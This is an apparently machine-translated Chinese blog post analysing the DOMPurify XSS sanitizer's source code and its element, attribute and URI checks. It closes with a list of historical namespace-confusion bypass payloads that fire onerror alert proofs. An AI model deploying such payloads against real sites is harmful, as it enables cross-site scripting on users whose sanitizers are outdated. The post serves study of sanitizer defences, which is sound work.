当前位置:网站首页>Analysis of dompurify
Analysis of dompurify
2022-06-24 15:16:00 【Deen_】
0x00 DOMPurify Introduce
DOMPurify Is an open source based on DOM Fast XSS Purification tools . Input HTML Elements , And then through DOM Parsing recursive element nodes , Conduct purification , Output safe HTML.
github Address :https://github.com/cure53/DOMPurify
Now the latest version :2.2.8
0x01 Common use
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>"); This code finally outputs <img src="x">
DOMPurify.sanitize Functions are the most common use , You can also take two parameters , The second parameter bit is the related configuration . Refer to official documents .
0x02 Debugging exploration
DOMPurify Using the ES6 Chinese grammar , I intend to pass webstorm Use node debug , So there are still some operations , as follows ( May refer to :Node.js Use in ES6 Medium import / export It's a complete collection of methods ):
- The code under this directory
https://github.com/cure53/DOMPurify/tree/main/srcPull it all down , Change the suffix to mjs.import createDOMPurify from "./DOMPurify-main/src/purify.mjs"; import JSDOM from 'jsdom'; const window = new JSDOM.JSDOM('').window; const DOMPurify = createDOMPurify(window); const html = "<img/src=x onerror=alert(1)>"; console.log(DOMPurify.sanitize(html)); - Their own main.js The code is
- node Add startup parameters --experimental-modules
0x03 sanitize Code follow up
Main code
Follow up analysis santize The main code of the function :
const nodeIterator = _createIterator(IN_PLACE ? dirty : body);
/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
/* Fix IE's strange behavior with manipulated textNodes #89 */
if (currentNode.nodeType === 3 && currentNode === oldNode) {
continue;
}
/* Sanitize tags and elements */
if (_sanitizeElements(currentNode)) {
continue;
}
/* Shadow DOM detected, sanitize it */
if (currentNode.content instanceof DocumentFragment) {
_sanitizeShadowDOM(currentNode.content);
}
/* Check attributes, sanitize if necessary */
_sanitizeAttributes(currentNode);
oldNode = currentNode;
}
oldNode = null;dirty For the object to be purified , That is, the data we entered .
- First, through
_createIteratorFunction andwhile ((currentNode = nodeIterator.nextNode())), Will convert the input elements into one by one HTMLelement Elements . Such as<img src=x><svg src=x>Will turn into img and svg Two elements - Then enter while Of body To operate , here currentNode namely img and svg Elements .
- There will be two purification operations , One is
_sanitizeElements, One is_sanitizeAttributes. _sanitizeElementsfunction , seeing the name of a thing one thinks of its function , I.e. purification label_sanitizeAttributesThat is, the attributes of the purification label
_sanitizeElements function
/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
_forceRemove(currentNode);
return true;
}
/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);The tag name contains unicode Character , Remove directly . Then the same tag name is converted to lowercase .
if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
/* Keep content except for bad-listed elements */
if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
const parentNode = getParentNode(currentNode) || currentNode.parentNode;
const childNodes = getChildNodes(currentNode) || currentNode.childNodes;
if (childNodes && parentNode) {
const childCount = childNodes.length;
for (let i = childCount - 1; i >= 0; --i) {
parentNode.insertBefore(
cloneNode(childNodes[i], true),
getNextSibling(currentNode)
);
}
}
}
_forceRemove(currentNode);
return true;
}Filter tags that are not on the white list , The white list is tags.js.
export const html = freeze([ 'a', 'abbr', 'acronym', 'address', 'area', 'article', 'aside', 'audio', 'b', ......
/* Check whether element has a valid namespace */
if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
_forceRemove(currentNode);
return true;
}
if (
(tagName === 'noscript' || tagName === 'noembed') &&
regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
) {
_forceRemove(currentNode);
return true;
}Verify namespace , There used to be bypass, Here's another one noscript Label verification operation , I feel a little redundant , Because it's not on the white list , Already on top of it is remove 了 .
_sanitizeAttributes function
First of all, whatever the attribute , Directly from the current currentNode remove.
if (hookEvent.forceKeepAttr) {
continue;
}
/* Remove attribute */
_removeAttribute(name, currentNode);
/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
continue;
} Then according to the tag name , And property names , The value of the property is a _isValidAttribute The judgment of the .
const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
continue;
}If it's legal attr, Call setAttribute Methods will attr To restore .
pivotal _isValidAttribute function . You can debug to try to bypass ....nice try....
if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
// This attribute is safe
} else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
// This attribute is safe
/* Otherwise, check the name is permitted */
} else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
return false;
/* Check value is safe. First, is attr inert? If so, is safe */
} else if (URI_SAFE_ATTRIBUTES[lcName]) {
// This attribute is safe
/* Check no script, data or unknown possibly unsafe URI
unless we know URI values are safe for that attribute */
} else if (
regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
) {
// This attribute is safe
/* Keep image data URIs alive if src/xlink:href is allowed */
/* Further prevent gadget XSS for dynamically built script tags */
} else if (
(lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
lcTag !== 'script' &&
stringIndexOf(value, 'data:') === 0 &&
DATA_URI_TAGS[lcTag]
) {
// This attribute is safe
/* Allow unknown protocols: This provides support for links that
are handled by protocol handlers which may be unknown ahead of
time, e.g. fb:, spotify: */
} else if (
ALLOW_UNKNOWN_PROTOCOLS &&
!regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
) {
// This attribute is safe
/* Check for binary attributes */
// eslint-disable-next-line no-negated-condition
} else if (!value) {
// Binary attributes are safe at this point
/* Anything else, presume unsafe, do not add it back */
} else {
return false;
}0x04 history Bypass
Can be in pull requests and releases The update log of found , Such as :
Obfuscate namespaces to bypass :https://github.com/cure53/DOMPurify/pull/495
payloads:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)><svg></p><style><a id="</style><img src=1 onerror=alert(1)>"><math><mtext><table><mglyph><style><!--</style><img title="--><img src=1 onerror=alert(1)>"><form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">
边栏推荐
- Golang实现Biginteger大数计算
- Database considerations
- The industrial control security of roaming the Intranet
- Service visibility and observability
- Common sense knowledge points
- In the eyes of the universe, how to correctly care about counting East and West?
- I have been in the industry for 4 years and have changed jobs twice. I have learned a lot about software testing
- 15 differences between MES in process and discrete manufacturing enterprises (Part 2)
- A series of problems caused by IPVS connection reuse in kubernetes
- 实战 | 记一次曲折的钓鱼溯源反制
猜你喜欢

从pair到unordered_map,理论+leetcode题目实战

GO语言-goroutine协程的使用

Keras deep learning practice (11) -- visual neural network middle layer output

Method after charging the idea plug-in material theme UI

As a developer, what is the most influential book for you?

Bert-whitening 向量降维及使用

Explore cloud native databases and take a broad view of future technological development

laravel 8 实现Auth登录

The "little giant" specialized in special new products is restarted, and the "enterprise cloud" digital empowerment

Data sharing between laravel lower views
随机推荐
股票网上开户及开户流程怎样?网上开户安全么?
Development of digital Tibetan product system NFT digital Tibetan product system exception handling source code sharing
3 ring kill 360 security guard process
Which account of Dongfang fortune is safer and better
C language ---18 function (user-defined function)
List of PostgreSQL
One article to get UDP and TCP high-frequency interview questions!
Left hand code, right hand open source, part of the open source road
ES mapping之keyword;term查询添加keyword查询;更改mapping keyword类型
[ansible problem processing] remote execution user environment variable loading problem
【ansible问题处理】远程执行用户环境变量加载问题
MySQL log management, backup and recovery
I have been in the industry for 4 years and have changed jobs twice. I have learned a lot about software testing
Istio Troubleshooting: using istio to reserve ports causes pod startup failure
缓存使用中Redis,Memcached的共性和差异分析
IList of PostgreSQL
Openinstall joins hands with the book chain to help channel data analysis and create the era of Book Networking
Successfully solved: selenium common. exceptions. SessionNotCreatedException: Message: session not created: This versi
Two way combination of business and technology to build a bank data security management system
R语言plotly可视化:可视化模型在整个数据空间的分类轮廓线(等高线)、meshgrid创建一个网格,其中每个点之间的距离由mesh_size变量表示、使用不同的形状标签表征、训练、测试及分类标签